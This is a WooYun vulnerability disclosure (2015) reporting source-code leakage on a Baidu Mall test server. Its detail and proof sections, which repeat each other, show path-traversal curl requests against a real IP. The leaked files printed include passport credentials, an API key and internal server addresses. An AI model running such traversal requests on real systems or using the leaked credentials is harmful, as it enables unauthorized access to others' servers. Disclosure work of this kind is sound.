当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133183

漏洞标题:百度某待上线业务配置错误导致源码泄露

相关厂商:百度

漏洞作者: 举起手来

提交时间:2015-08-11 09:39

修复时间:2015-09-25 11:30

公开时间:2015-09-25 11:30

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-11: 细节已通知厂商并且等待厂商处理中
2015-08-11: 厂商已经确认,细节仅向厂商公开
2015-08-21: 细节向核心白帽子及相关领域专家公开
2015-08-31: 细节向普通白帽子公开
2015-09-10: 细节向实习白帽子公开
2015-09-25: 细节向公众公开

简要描述:

杀器在手!说走就走啊~

详细说明:

百度商城,貌似还没上线的业务(MALL.baidu.com)啊;http://180.149.144.64 这个是测试环境,尼玛node.js的,屌的一笔。
首先是这样的。

[root@li498-106 ~]# curl "http://180.149.144.64/xxx"
<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <title>百度Mall</title>
        <link rel="shortcut icon" href="http://www.baidu.com/favicon.ico" >
        <script src="/js/common/core.js"></script>
        <script>
            require.config({
                waitSeconds: 30,
                baseUrl: '/js'
            });
        </script>
    </head>
    <body>
<h2>Not Found, url:/xxx</h2>
Error: Not Found, url:/xxx
    at /home/work/mall_online/mall/app.js:50:15
    at Layer.handle [as handle_request] (/home/work/mall_online/mall/node_modules/express/lib/router/layer.js:82:5)
    at trim_prefix (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:302:13)
    at /home/work/mall_online/mall/node_modules/express/lib/router/index.js:270:7
    at Function.proto.process_params (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:321:12)
    at next (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:261:10)
    at SendStream.error (/home/work/mall_online/mall/node_modules/express/node_modules/serve-static/index.js:107:7)
    at SendStream.emit (events.js:107:17)
    at SendStream.error (/home/work/mall_online/mall/node_modules/express/node_modules/send/index.js:250:17)
    at SendStream.onStatError (/home/work/mall_online/mall/node_modules/express/node_modules/send/index.js:346:48)
        <script>
            var GLOBAL_CONF = {"debug":true,"passport":{"host":"passport.rdtest.baidu.com","tpl":"cmovie"}};
        </script>
    </body>
</html>


有报错,目测可以读文件,原谅我没有能读取系统任意文件,但是代码文件是可以随意读

[root@li498-106 ~]# curl "http://180.149.144.64/../../../../../../../../../../..//../../..//home/work/mall_online/mall/app/../config/passport.js"
/**
 * @file passport.js
 * @author pengxing (pengxing@baidu.com)
 * @description
 *  passport conf
 */
module.exports = {
    host: 'wappass.baidu.com',
    apid: 0x0523,
    tpl: 'cmovie',
    app_user: 'cmovie',
    app_passwd: 'cmovie',
    sapi: {
        'cmovie_1315': '14c7e9fbcdb6d1eac8d6cc4b885babc8'
    },
    server: {
        session: {
            port: 7801,
            timeout: 1000,
            servers: []
        }
    }
};
// 机器列表  http://tc-passport-op00.tc.baidu.com/authorize/session/apply
// 根据当前的idc,来判断请求哪个passport
switch (process.env.IDC) {
    case 'hz':
    case 'nj':
        // hz机房只有链接这两个机器才比较快
        module.exports.server.session.servers = [
            {
                ip: '10.212.7.12'
            },
            {
                ip: '10.208.7.34'
            },
            {
                ip: '10.202.6.38'
            }
        ];
        break;
    // bj机房连接这四个passport都很快
    case 'bj':
    default:
        module.exports.server.session.servers = [
            {
                ip: '10.36.7.65'
            },
            {
                ip: '10.65.211.140'
            },
            {
                ip: '10.26.7.72'
            },
            {
                ip: '10.81.211.104'
            }
        ];
}
/////////////////////////////////////////
var globalConf = require('./global');
if (globalConf.debug) {
    var offline = {
        host: 'passport.rdtest.baidu.com',
        server: {
            session: {
                port: 8998,
                timeout: 3000,
                servers: [
                    {
                        ip: "10.48.20.13"
                    }
                ]
            }
        }
    };
    module.exports.host = offline.host;
    module.exports.server = offline.server;
}


[root@li498-106 ~]# curl "http://180.149.144.64/../../../../../../../../../../..//../../..//home/work/mall_online/mall/app/config.js"
var movie = require('./movie');
var users = require('./users');
var goodsList = require('./goodsList');
var index = require('./index');
var product = require('./product');
var cart = require('./cart');
var orderSure = require('./orderSure');
var address = require('./address');
var market = require('./market');
var shop = require('./shop');
var user = require('./user');
var dal = require('../lib/dal');
var url = require('./url');
var common = require('./common');
var test = require('./test');
var login = require('./login');
var flpurchase=require('./flpurchase');
module.exports = function(app) {
    // 这个对象会作为前端的全局config对象使用
    // 后续 config/categories 里的数据也用这种方式引入,避免每个请求都去处理一次。@shanshan
    app.locals.frontendConfig = {
        debug: require('../config/global').debug,
        passport: {
            host: require('../config/passport').host,
            tpl: require('../config/passport').tpl,
        }
    };
    app.locals.menuCategories = require('../config/categories');
    // passport
    var passport = require('../lib/middlewares/passport');
    // app.use(passport.passport);
    app.get('/user/loginInfo', passport.passport, function (req, res ,next) {
        res.send(res.locals.user);
    });
    app.use('/test', test);
    app.use('/login', login);
    app.use('/flpurchase',flpurchase);
    app.use('/common', common);
    app.use(url.homeIndex, user);
    app.get('/', index.home);
    app.use('/shop', shop);
    app.get('/movie/hot', movie.hot);
    app.get('/users', users.index);
    app.get('/goodsList', goodsList.search);
    app.use('/product',product);
    // app.get('/item/:id', product.product);
    app.use('/cart', cart);
    app.use('/market', market);
    app.use('/order', orderSure);
    app.use('/address', address);
};

漏洞证明:

百度商城,貌似还没上线的业务啊;http://180.149.144.64 这个是测试环境,尼玛node.js的,屌的一笔。
首先是这样的。

[root@li498-106 ~]# curl "http://180.149.144.64/xxx"
<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <title>百度Mall</title>
        <link rel="shortcut icon" href="http://www.baidu.com/favicon.ico" >
        <script src="/js/common/core.js"></script>
        <script>
            require.config({
                waitSeconds: 30,
                baseUrl: '/js'
            });
        </script>
    </head>
    <body>
<h2>Not Found, url:/xxx</h2>
Error: Not Found, url:/xxx
    at /home/work/mall_online/mall/app.js:50:15
    at Layer.handle [as handle_request] (/home/work/mall_online/mall/node_modules/express/lib/router/layer.js:82:5)
    at trim_prefix (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:302:13)
    at /home/work/mall_online/mall/node_modules/express/lib/router/index.js:270:7
    at Function.proto.process_params (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:321:12)
    at next (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:261:10)
    at SendStream.error (/home/work/mall_online/mall/node_modules/express/node_modules/serve-static/index.js:107:7)
    at SendStream.emit (events.js:107:17)
    at SendStream.error (/home/work/mall_online/mall/node_modules/express/node_modules/send/index.js:250:17)
    at SendStream.onStatError (/home/work/mall_online/mall/node_modules/express/node_modules/send/index.js:346:48)
        <script>
            var GLOBAL_CONF = {"debug":true,"passport":{"host":"passport.rdtest.baidu.com","tpl":"cmovie"}};
        </script>
    </body>
</html>


有报错,目测可以读文件,原谅我没有能读取系统任意文件,但是代码文件是可以随意读

[root@li498-106 ~]# curl "http://180.149.144.64/../../../../../../../../../../..//../../..//home/work/mall_online/mall/app/../config/passport.js"
/**
 * @file passport.js
 * @author pengxing (pengxing@baidu.com)
 * @description
 *  passport conf
 */
module.exports = {
    host: 'wappass.baidu.com',
    apid: 0x0523,
    tpl: 'cmovie',
    app_user: 'cmovie',
    app_passwd: 'cmovie',
    sapi: {
        'cmovie_1315': '14c7e9fbcdb6d1eac8d6cc4b885babc8'
    },
    server: {
        session: {
            port: 7801,
            timeout: 1000,
            servers: []
        }
    }
};
// 机器列表  http://tc-passport-op00.tc.baidu.com/authorize/session/apply
// 根据当前的idc,来判断请求哪个passport
switch (process.env.IDC) {
    case 'hz':
    case 'nj':
        // hz机房只有链接这两个机器才比较快
        module.exports.server.session.servers = [
            {
                ip: '10.212.7.12'
            },
            {
                ip: '10.208.7.34'
            },
            {
                ip: '10.202.6.38'
            }
        ];
        break;
    // bj机房连接这四个passport都很快
    case 'bj':
    default:
        module.exports.server.session.servers = [
            {
                ip: '10.36.7.65'
            },
            {
                ip: '10.65.211.140'
            },
            {
                ip: '10.26.7.72'
            },
            {
                ip: '10.81.211.104'
            }
        ];
}
/////////////////////////////////////////
var globalConf = require('./global');
if (globalConf.debug) {
    var offline = {
        host: 'passport.rdtest.baidu.com',
        server: {
            session: {
                port: 8998,
                timeout: 3000,
                servers: [
                    {
                        ip: "10.48.20.13"
                    }
                ]
            }
        }
    };
    module.exports.host = offline.host;
    module.exports.server = offline.server;
}


[root@li498-106 ~]# curl "http://180.149.144.64/../../../../../../../../../../..//../../..//home/work/mall_online/mall/app/config.js"
var movie = require('./movie');
var users = require('./users');
var goodsList = require('./goodsList');
var index = require('./index');
var product = require('./product');
var cart = require('./cart');
var orderSure = require('./orderSure');
var address = require('./address');
var market = require('./market');
var shop = require('./shop');
var user = require('./user');
var dal = require('../lib/dal');
var url = require('./url');
var common = require('./common');
var test = require('./test');
var login = require('./login');
var flpurchase=require('./flpurchase');
module.exports = function(app) {
    // 这个对象会作为前端的全局config对象使用
    // 后续 config/categories 里的数据也用这种方式引入,避免每个请求都去处理一次。@shanshan
    app.locals.frontendConfig = {
        debug: require('../config/global').debug,
        passport: {
            host: require('../config/passport').host,
            tpl: require('../config/passport').tpl,
        }
    };
    app.locals.menuCategories = require('../config/categories');
    // passport
    var passport = require('../lib/middlewares/passport');
    // app.use(passport.passport);
    app.get('/user/loginInfo', passport.passport, function (req, res ,next) {
        res.send(res.locals.user);
    });
    app.use('/test', test);
    app.use('/login', login);
    app.use('/flpurchase',flpurchase);
    app.use('/common', common);
    app.use(url.homeIndex, user);
    app.get('/', index.home);
    app.use('/shop', shop);
    app.get('/movie/hot', movie.hot);
    app.get('/users', users.index);
    app.get('/goodsList', goodsList.search);
    app.use('/product',product);
    // app.get('/item/:id', product.product);
    app.use('/cart', cart);
    app.use('/market', market);
    app.use('/order', orderSure);
    app.use('/address', address);
};

修复方案:

~

版权声明:转载请注明来源 举起手来@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-08-11 11:29

厂商回复:

感谢提交

最新状态:

暂无